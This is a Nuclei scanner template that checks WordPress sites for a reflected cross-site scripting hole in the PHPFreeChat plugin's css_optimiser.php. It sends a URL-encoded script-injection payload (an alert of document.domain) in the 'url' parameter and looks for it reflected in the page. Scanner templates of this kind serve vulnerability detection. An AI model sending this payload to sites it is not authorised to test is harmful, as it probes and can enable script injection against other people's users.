id: wp-phpfreechat-xss

info:
  name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  reference: https://www.securityfocus.com/bid/54332/info
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
